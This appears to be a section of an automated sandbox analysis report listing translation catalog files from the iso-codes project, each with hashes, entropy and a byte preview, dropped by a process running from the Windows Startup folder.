                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 44 messages, Project-Id-Version: iso_3166-2 'Sam\303\263 Meirice\303\241nach'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2380
                                                                                                    Entropy (8bit):5.013878498548355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:mMXfJiDjXTmkbhNp9cGx9aazx/UiMvxFoEeYQDB2ed:mKfoZ1/N/JwxFAYled
                                                                                                    MD5:ABD75C9A131F5609F0B47EBB88CC9406
                                                                                                    SHA1:E090B40AFA3C518E10D0D0B6E50B5197E58754BB
                                                                                                    SHA-256:1DAB75233392A0376E60C959D1562A4F2EB1596E1CB52302CC537FD880E4707A
                                                                                                    SHA-512:7B45D006FEF3E1B00096F84B2ABFA69211AB0BAB3AFCEF381EA276614A6D6D701D9ABF1B4690B00C869982518810E84A3A6119FF01ED13634CEB23FE7D7E5F72
                                                                                                    Malicious:false
                                                                                                    Preview:........,.......|...;...................................................................................................................%.......-.......8.......=.......G.......M.......U.......^.......d.......l.......u.......~...........................................................................................................$...................(.......2.......:.......B.......H.......Q.......e.......k.......w...............................................................................................................................%.......+.......4.......>.......J.......N.......U.......`.......i.......q.......~.......................................................................................&.......2.......B...........)...........(.......%.......................................*...............................+...........&...,...................................$...........'... ...!.......................#..................................."....American Samoa.Aruba.Belize.Car
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Cr\303\255ocha Briotanacha na hAntartaice'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2691
                                                                                                    Entropy (8bit):5.194083617526417
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADmryUFluvGqIfdvqNuoUnSz6VKT5dMRNtO:qD3UFUyBooc65Y
                                                                                                    MD5:F1E1D9F25C7AAEBF091FDE4E26FB0A35
                                                                                                    SHA1:73B2E9C83B39C4196B4B1597AC7F01F13BAF8C39
                                                                                                    SHA-256:2CDB8395988FDA44F7C989CE0EC0159B96C3E0F8EE0B6552CEDB86A244B344FF
                                                                                                    SHA-512:9A1EB35AB1636F1825E34AB5314BF3B895387771F03AA5F12E64BB1AF14694B2AB16D2A6DECF2745EBF9531B978A9402C8C30590BA0514654EBB1F06D1DF8CC1
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........o.......#.......'...=...1...e...........'.......................................*...'..."...R...#...u...................................................1...........?.......U.......u.......|...5.......1...........................2.../...?.......o........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 71 messages, Project-Id-Version: iso_4217 'Afgain\303\255'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4140
                                                                                                    Entropy (8bit):4.949671337229051
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:WGhdROouqVK+WrBPhe7gXjLskkE3SId3cpOmUqzFFU5qwipPhNS7mDWI2dnYu3ok:WaRRgLf8HpOmFzQGpcYu3oun3
                                                                                                    MD5:2084D83E7BAB602207E62D3582B263DB
                                                                                                    SHA1:BE4D158629D06FAA048698DB21ADE137D5FCB686
                                                                                                    SHA-256:4500D255ED9FB1442B6C5172550360A99625CE2EED2ADD27964D33FF4AF99FC7
                                                                                                    SHA-512:3636BD2D4A662EA8986AAE9FA236640DF4770B3EA895E999C78838E5E25CDFC172E24F43BB789C4B2CB2D10359BCBC4084DADB373AD802B7BEFD08A92C81828D
                                                                                                    Malicious:false
                                                                                                    Preview:........G.......T...a...................................(.......7.......E.......W.......g.......v...............................................................................................%.......4.......F.......Q.......^.......m.......|.......................................................................................................'.......7.......G.......U.......d.......t...............................................................................................2.......>.......O.......V.......g.......~...........................................................................Z...........o.......x...............................................................................1.......B.......T.......d.......s.......}...............................................................................%.......:.......L.......Q.......`.......s.......w...............................................................................".......5.......C.......U.......n.......}...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 202 messages, Project-Id-Version: iso_639-3 'Abc\303\241isis'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8814
                                                                                                    Entropy (8bit):4.757207525383754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:VrhHoTyutjum1enAe4sGqZML47l3IOw1uZoQ4ct6OQiNfC:ZVo+BKuL4sGoML474gm3coniNK
                                                                                                    MD5:8FA90598BC96919B85D02C03D7785753
                                                                                                    SHA1:F1E16B4E15BA1ABBFDBC79979297AD3DBE857B86
                                                                                                    SHA-256:A7F7382B151CB155D0C7DA453DFD507DCF8FDD2AED0D546A77B5805D648774DC
                                                                                                    SHA-512:A6C4AB649CE8EC6E3A2B25646E0040B5B5ECCC9E6E76DAE98AE7D160C08C3083F74EC0542CDAD94F3D19CEDD0FBCCEE994EF79C62AD4AEC6998F93C2D245BDE0
                                                                                                    Malicious:false
                                                                                                    Preview:................l.......................................................................!.......'......./.......6.......@.......I.......R.......Y.......a.......h.......t.......|.......................................................................................................................................................".......'.......0.......6.......=.......C.......L......._.......g.......o.......................................................................................................................................&...............7.......=.......F.......M.......T......._.......e.......o.......w...........................:...........................................................'......./.......8.......A.......I.......P.......\.......e.......n.......x.......................................................................................................................................................................$.......,.......3.......<.......A.......G.......O.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 113 messages, Project-Id-Version: iso_3166-1 '\341\212\240\341\210\215\341\211\243\341\212\222\341\213\253'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5761
                                                                                                    Entropy (8bit):5.031162986892688
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5Ls5IFWYXx5O89kjFbEylUyA6eMBDG7sT/TLBwpoikd6bWLy:iIJb0FbEKtxd2fSSd
                                                                                                    MD5:E734425EF4E75F262CA2CEB13FD21F98
                                                                                                    SHA1:27603E43B0EC1F635F54CAE013CAFF5AC643C29F
                                                                                                    SHA-256:269CCCEEAD3D14F1032A1D87418764B9749D44DC0581D9F931A08A568ACFF93B
                                                                                                    SHA-512:14E65DF5EB6E576B56B4AE3B7471115099D494148D7C7879C43858C24CB603F9F2B68C5FC6FC61BE02EAF0296726AF247E85E5A3BD65312D7AD5B5CC9B28A9A9
                                                                                                    Malicious:false
                                                                                                    Preview:........q...............,.......................................................................................................................................................&.......-.......D.......M.......V......._.......x.......}...............................................................................................................................................".......0.......A.......].......d.......l.......t.......{...............................................................................................................................................................................&.......0.......7.......@.......H.......P.......V.......b.......p.......|...............................................................................................................................................!.......,.......5.......A.......U.......].......d.......y...................................................M...................%.......5.......B.......U.......e.......{.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\341\212\224\341\213\230\341\210\255\341\210\213\341\212\225\341\213\265\341\210\265\341\215\241\341\212\240\341\212\225\341\211\262\341\210\215\341\210\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):476
                                                                                                    Entropy (8bit):5.404193692215078
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i361xjt02UkLKcG/Ki4FLwPvXmBQWihpzl:Mm5t0UPKKzF4vXm2
                                                                                                    MD5:2F292856C0A4BC0D6E9EEDB521DB7CF6
                                                                                                    SHA1:C402EEB483EFDDC0505CA31A1BF4E32BACC2D674
                                                                                                    SHA-256:CE1234C4C9DD423DC09F7DC0D64C00F4187EBB680F057DEE623D0C361D4D86A8
                                                                                                    SHA-512:EC5FAECD3DD513B06694031409EF500B28C323250BDFA47564533831A285EF8BCE60018278C9B65B3F186CBC7A78E089505CF9563FDDB27CC47BE12143706204
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...M...f...'............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Geez.Language: gez.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 121 messages, Project-Id-Version: iso_639-3 '\341\212\240\341\211\245\341\210\220\341\213\232\341\212\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5696
                                                                                                    Entropy (8bit):4.868155374625738
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kGQGu8IdRxHKv4zEyCrG+Kbpy95Mon/2pL5lsx2OrtZFdjVoEP0GCuk:k0u8/4zEbG+KU9qhlIkOrtZrjnMuk
                                                                                                    MD5:AFCF97F6AB1379D39A3C7EE22CE7B42E
                                                                                                    SHA1:D720FDA777D9A551808CC70DFE5B4AC774D1F68D
                                                                                                    SHA-256:D1F6261B63CD376DF083CB6070EE275452976F9B2C348566D170AF85C4B7DDF7
                                                                                                    SHA-512:3262FB2807094FF66FF3E2446A1324C281E288E09D5E7746DF8FE2C1A2FE38D1E3B8565D7B9A9B678C712F6FA8F591D8B4FC34AC6FD2665EFCAF4A03110BB2C9
                                                                                                    Malicious:false
                                                                                                    Preview:........y.......................8.......9.......C.......H.......R.......[.......c.......j.......s.......|...............................................................................................................................................................".......+.......3.......:.......B.......I.......N.......W.......^.......f.......o.......u.......|...............................................................................................................................................................$.......,.......4.......?.......J.......S.......].......e.......k.......s.......}.......................................................................................................................................................................&.......0.......6.......>.......F.......L.......R.......X......._.......d.......l.......r.......{...................................................................................................................................I...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 145 messages, Project-Id-Version: iso_15924 '\303\201rabe'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8054
                                                                                                    Entropy (8bit):5.019187554339782
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:AGUVlNGtbut4ndjaSa5pCVqTOe3NKg7JwWnJl:AlNGhU4djVa5pC693NKg7LJl
                                                                                                    MD5:225283C89E93310008E0746A1077ACE4
                                                                                                    SHA1:CACEB64ED03F78E38D585E99CB3AE5F812CDBF66
                                                                                                    SHA-256:E414A488BABF5AD3271A74C915E2EA9B0C22F30675B1A92865A6F062F54070B9
                                                                                                    SHA-512:AB29863DFE13FF28E4D1B49F49A885A109CD6AD32562671DA483CF854D3D53C38DCC973E3D92C59F143A39F1840121159E89A998D08263CB6B5E8B2AFBFB244E
                                                                                                    Malicious:false
                                                                                                    Preview:........................,.......0.......1.......8.......A.......I.......R.......X.......b.......h.......p.......|...............................................................................................................!.......>.......E.......`.......h...&...q...................(...........................................&.......8.......M.......X......._.......g.......m.......v...............................................................................+.......A.......X...........................................................#.................................................../.......F.......U.......[.......d.......m.......{...........................................................................................(...&.......O.......a...-...k...........................#.......".......)...........#...............:.......L.......e.......k.......s................................................... ...................................#.......*.......5.......D.......P.......X.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 411 messages, Project-Id-Version: iso_3166-1 'Afganist\303\241n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23252
                                                                                                    Entropy (8bit):5.033212110678132
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:RWN886/5rK1sGK+JfP06krPW8jh5wsOP4XLAE1i3K90YApZA6tl+V:af26krtmsOP4XLAE50YApZA6tlu
                                                                                                    MD5:A7FA02CD5A2CE36B38E4202C840E0606
                                                                                                    SHA1:418979231AE5F57EA6813D72D7439375816B5F31
                                                                                                    SHA-256:3CEAB07341AE7B363E6917180EEC8AFF483D301069070059CF6AD7D401A355CD
                                                                                                    SHA-512:A3E689B9179474BE6DD5CD29D54BD06DCB57FE6D3D47632D3DA1AB43806065806E04A436B016AEEA110BD9F6ABF68056B6467A32D79B1AB5A36995182FA10DC1
                                                                                                    Malicious:false
                                                                                                    Preview:....................-............".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#......%#....../#......7#......B#......J#......R#......]#......f#......n#......v#......}#.......#.......#.. ....#.......#.......#.. ....#.......#.......$.......$......*$......1$......P$......g$......y$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%......4%..,...P%......}%.......%..%....%.......%.......%.......%.......%.......%.......%.......%.......%.......%..%....&..,...2&.."..._&..*....&.......&.......&.......&.......&.......&.......&.......&.......'.......'......"'......*'......2'......;'......D'......`'..'...n'..$....'.......'.......'.......'.......(.......(......L(......Q(......Y(......`(......n(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......).......).......)......()......-)......7)......@)......G)......U)......\)......b)..!...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Territorio Brit\303\241nico da Ant\303\241rtida'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2695
                                                                                                    Entropy (8bit):5.184723605369333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VAD76UrOxEJuvGqIfdvqNuoUWtzIYWiQM7carjwQtXQu:qD+JyBo5zI7lg1r6u
                                                                                                    MD5:B3D91A5C4CFBD76E5C605D0AE8FC5CC4
                                                                                                    SHA1:E39ABE3D79CF06ABCEF43524C540BAD837A11043
                                                                                                    SHA-256:DEB32CD34B82090BE1EEC473DA562C25753CCAA9912F11D35AD49832DF148958
                                                                                                    SHA-512:E3BD9972EE049BD8592C10753BAB35CB25E610EC75900DDC4AED1EA75F645CFFC37D69F7FF87CCB10C46AE664122DD52E1919BFFCFD336510C24180D8CB7DD33
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................#...P...)...t...0...............(.........................../.......;...)...Q...,...{...#...................................................".......2.......a.......z...................".......3...............$...........>...)...H.......r........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 46 messages, Project-Id-Version: iso_4217 'Dinar alxeriano'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2840
                                                                                                    Entropy (8bit):4.926681586145203
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rxiE3V2tWupFYygVnq3XTqSqxSMPmUsDgchZlAEuj7:1iW2EVerEm9Drqj7
                                                                                                    MD5:5EB87ACF09C966E470D2E21BD15FA6BA
                                                                                                    SHA1:96DB3DF6A56919D2C6573D8093347B6F921EB96B
                                                                                                    SHA-256:2B8F41A5F359F0FAEB89C9372393566C3A1DD2B60007F924EE5D26ADF005E041
                                                                                                    SHA-512:19F93D8298A454F1EEE677DE9B703D60A479677A8E6021B19C23FFB9A4413974A56767ACCD3687089212D20B4EEC35A780C5D393450CE1EE28E391E1E9F10B34
                                                                                                    Malicious:false
                                                                                                    Preview:....................=...........................................".......1.......A.......O.......`.......n.......|....................................................................................... ...............?.......L.......Y.......e.......u...............................................................................................0.......<.......I.......d.......s.......~...........j...........................'.......:.......K......._.......p.......................................................................................).......7.......G.......Z.......l...............................................................................................+.......A.......`.......p...................................................................................-...*...........................(...)...........................%...........................+...................!....... ...#...........................................................,...$...............&......."...'...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7322 messages, Project-Id-Version: iso_639-3 'Are are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):306888
                                                                                                    Entropy (8bit):5.219978031434053
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:7qnUsK0a7mjj8B2ArVyu2m17eHPke9BLDey3hZElc6tkiicXZk6lcHpsDT466irq:eUsKX4u2NB5ygzSBoj
                                                                                                    MD5:16FCE63105A2AEB9E3F1E8D854977CC8
                                                                                                    SHA1:A0B78420C104ED582AD56F9CE7CA2201138B44C7
                                                                                                    SHA-256:275A79ECC9DD21D78885BD92264D2AB4C104B0327FDD7B3E4D5870A7C3018A91
                                                                                                    SHA-512:482020AB7C4B558DA123C89550B78AF63A1ADE0335864385F9EC9782630FF66E60C43723A9B840F405C806CB0EB3A42DD5A91E061855627BB6E1001E91D70212
                                                                                                    Malicious:false
                                                                                                    Preview:....................'&..........Xb......Yb......bb......lb......wb......|b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......b.......c.......c.......c.......c.......c.......c.......c......%c......-c......2c......:c......Ac......Fc......Nc......Sc......\c......hc......wc.......c.......c.......c.......c.......c.......c.......c.......c.......c.......c.......c.......c.......c.......c.......c.......d.......d.......d.......d......!d......&d......-d......5d......9d......?d......Dd......Yd......`d......id......sd......{d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......d.......e.......e......*e......:e......Je......Xe......me.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......e.......f.......f.......f.......f......!f.......f......4f......<f......Bf......Pf......_f......pf......|f.......f......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 209 messages, Project-Id-Version: iso_3166-1 'Albania'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8952
                                                                                                    Entropy (8bit):4.697165941272806
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:FQghohsykNNlJAGCqL6YLhBDFWmh/aRzug090A/aRzugY9F:Ft0HCXAG3/vVaNugU0uaNugoF
                                                                                                    MD5:BBE1C0CC95E8836BBDC5EEC9CDE56DCB
                                                                                                    SHA1:369342C6D918E82F5238A27CCDF4BD224BE1DCD2
                                                                                                    SHA-256:71F54B6278CE69B1BB049027532B6534517C817EA85059861E282A4867971D8F
                                                                                                    SHA-512:F31DA9C1D8F18A7A22E39DA80AA558D9C8C55EE4360CD889AF378C53DBB774CFA455C6D0790C1279A9AD4C5ABAE340ADBC45539A9E5E4E164F39A959BF07DE7A
                                                                                                    Malicious:false
                                                                                                    Preview:........................,...............................................................................................................................................#.......,.......4.......<.......C.......I.......Q.......X.......`.......i.......w.......~.......................................................................................................$.......5.......M.......V.......^.......k.......v.......~.......................................................................................................................................*......./.......7.......>.......L.......].......y.......................................................................................................................................................................'.......-.......7.......<.......D.......P.......W.......].......e.......k.......r.......y...............................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 '\340\252\205\340\252\253\340\252\230\340\252\276\340\252\250\340\252\277\340\252\270\340\253\215\340\252\244\340\252\276\340\252\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35101
                                                                                                    Entropy (8bit):4.966255659030273
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:snboRT6k+bRvMlzmwZbjh5wsWP4XWAIziUGChXCmoOhQvl8h7qU6hBElv/r9r1Y8:sxJOzmotmsWP4XWAIyg2ClY0SgqW
                                                                                                    MD5:CD52232DF976CB917D0560E644DD7D7A
                                                                                                    SHA1:CB8A906E103BCB64A2240076178A03C5FD37AD9A
                                                                                                    SHA-256:0536C80E3728A681A5F9BAB95ED995DFA8C884C227D5D15BA3EDFAA1058F1FBE
                                                                                                    SHA-512:4E4627BA7C7541EBAD17C163B40E44D065DEC6F073E800F2DF548ECC643CF50C77911E30B66DA5275C342B912921D24787EC91BCFE488395E1E40CC54F1E6948
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\252\254\340\253\215\340\252\260\340\252\277\340\252\237\340\252\277\340\252\266 \340\252\217\340\252\250\340\253\215\340\252\237\340\252\276\340\252\260\340\253\215\340\252\237\340\252\277\340\252\225 \340\252\237\340\253\207\340\252\260\340\253\200\340\252\237\340\252\260\340\253\200'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3904
                                                                                                    Entropy (8bit):5.16103567070982
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDTpFIyBodV9zH0e8Ldf0GodOcn/I7d0m00L:qDTEh0eKdf0G+OcQx0m0E
                                                                                                    MD5:2C68501A0FA1E6CFA235C84441CCFCEB
                                                                                                    SHA1:215E9D7D5679DC2645D6507B04CC50632FA42DF3
                                                                                                    SHA-256:B2989A542047A3B052BA71B5AE082604C0CECEC26CC75E495B37C4748C4DCAC2
                                                                                                    SHA-512:80D8C0C3A4FA8FA504A13582B7B4E852A8AE96A6E13DD401F1FC7C21CDB33A1F78E0B9CA10F5A0219EE1FA52E96048B4B23A9B01582478BA131D3876BC388C33
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................J...a...Q...............K...~...............P...;...f...........;.......B.......j...>...J.......E...........:.......Z...=...z...%.......(.......P.......2...X...A.......................B...........U...B.......X... .......y...........)............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 867 messages, Project-Id-Version: iso_639-3 '\340\252\206\340\252\270\340\252\276\340\252\225\340\253\215\340\252\267'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):44025
                                                                                                    Entropy (8bit):4.911571536908672
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:lL7e/Fx4xyyuuJhPrHkVzH3GoATzsCdF3IQEL03kEKyr+wpYaHrf:l7OFVyvv7oGoUJF3IQjJn
                                                                                                    MD5:78932043142E9B9061BCED1C50F2EBD8
                                                                                                    SHA1:07D985A38C821FC4A92FD916F5F8ABC053CE4EBC
                                                                                                    SHA-256:A763CAB2C3094D84CE6225F9B86F72C13CB1D91A40E230B12BC661D12D8C701B
                                                                                                    SHA-512:F7C212BDDC24F91F2378DF170D4763CCF4C589BBE03031074C1E8D31DC0C8765F4791DDBD25B5C0FEEDE638763C354D18B6CE716CB43D896A7624E187F371391
                                                                                                    Malicious:false
                                                                                                    Preview:........c.......4.......L6......xH......yH.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......I.......I.......I.......I.......I.......I......#I......(I......=I......FI......PI......VI......_I......hI......mI......wI.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......J.......J.......J.......J......$J......=J......MJ......ZJ......iJ......wJ.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......K......!K......*K......-K......5K......<K......DK......KK......PK......VK......]K......jK......vK......{K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......K.......L.......L.......L......%L......-L......4L......<L......AL......GL......OL......UL......ZL......`L......gL......mL......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 191 messages, Project-Id-Version: iso_3166-1 'Yn Afghanistaan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8982
                                                                                                    Entropy (8bit):4.829738009586998
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:28vYOpWtg+YuNTxzugsqbwz97QKY2nTRNv3D4u:TBpFuBtugsqbwp7q2TRhT5
                                                                                                    MD5:9BE103E398A667CC448C5F8DC44289D1
                                                                                                    SHA1:FB26F7232BBC88B40FF07B75F131EE1F61A863B5
                                                                                                    SHA-256:F2B11854A10F655481E121B2356BB402B9CC22213E158F4C17F2C78375557E9D
                                                                                                    SHA-512:9033B2D42F86C5A15D656332E8004833E8338F69E77463EBBB9106FD661691DC9E09E0C96C49A12F8FE5656D9DC7A9A624CD762FC10619A99AA47ECE61705C68
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................%.......-.......5.......<.......P.......Z.......b.......l.......t.......................................................................................................................................................&.......-.......F.......K.......Q.......i.......r.......z............................................................................................................................... .......?.......D.......L.......S.......Y.......a.......i.......o.......y...................................................................!...........................................................................+.......2.......8.......@.......F.......M.......T......._.......e.......n.......u...............................................................................................................................................................".......+.......6.......>.......I.......Q.......Y......._.......e.......q.......}.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 119 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5135
                                                                                                    Entropy (8bit):4.632367543056903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Y7H7fCrwwBaeBLKu9Xiuyz89uEWbfyIwe4KX9HuF6uJ:GH76rwwFNKuB/yz89GqY4KFcZ
                                                                                                    MD5:7687A60B4ACD432190F41A9980C5B778
                                                                                                    SHA1:6186EF1002B3B06C8CA3BC09B1227D6F96FC3D66
                                                                                                    SHA-256:4E71C2FFB54310BC0725CE1DFD661CC738201A174794515E92FAB637E32CEB28
                                                                                                    SHA-512:15256E94F46683BE5F9394083EE77CC1642BC8E4B7AEAC7174ADBD01CBD856F73801246A04D931080AD35151CF47783EE009FB402B8D76761ECEB024DBB5C66B
                                                                                                    Malicious:false
                                                                                                    Preview:........w.......................................%.......-.......5.......=.......D.......N.......V.......`.......h.......s.......{.......................................................................................................................................................#.......2.......:.......C.......K.......Q.......Z.......b.......i.......q.......y.......................................................................................................................................................................!.......(.......0.......6.......D.......N.......Y.......b.......k.......p.......v...............................................................................................................................................................'.......2.......?.......G.......N.......X.......a.......j.......r...............................................................................................................................%.......-.......3.......B...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 20 messages, Project-Id-Version: iso_3166-1 'Belarusa'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1305
                                                                                                    Entropy (8bit):5.105510594236593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:cx3mTSHZxCiMlp2K4tN8jt0UGdg/pXmGRqhYpGwAWOoaLol:cx2EZxklpd4tCyUHMnhWN
                                                                                                    MD5:106B7241F086065157C3E8635AD86D19
                                                                                                    SHA1:8C6FAFF3C14462286E9917D959D194F97E2D1F04
                                                                                                    SHA-256:891730A8355BDA30D21DFE47D4F616992FF49D6BEFDA0F3576923473EC51A77D
                                                                                                    SHA-512:99315E8624F000FB1842D321A9322AA072EA131C12148853F07261BE126F79FE352C52350F077F768BAB42FBADC2FFD67A0EC34EADA0BDDAEE8748B1353740F8
                                                                                                    Malicious:false
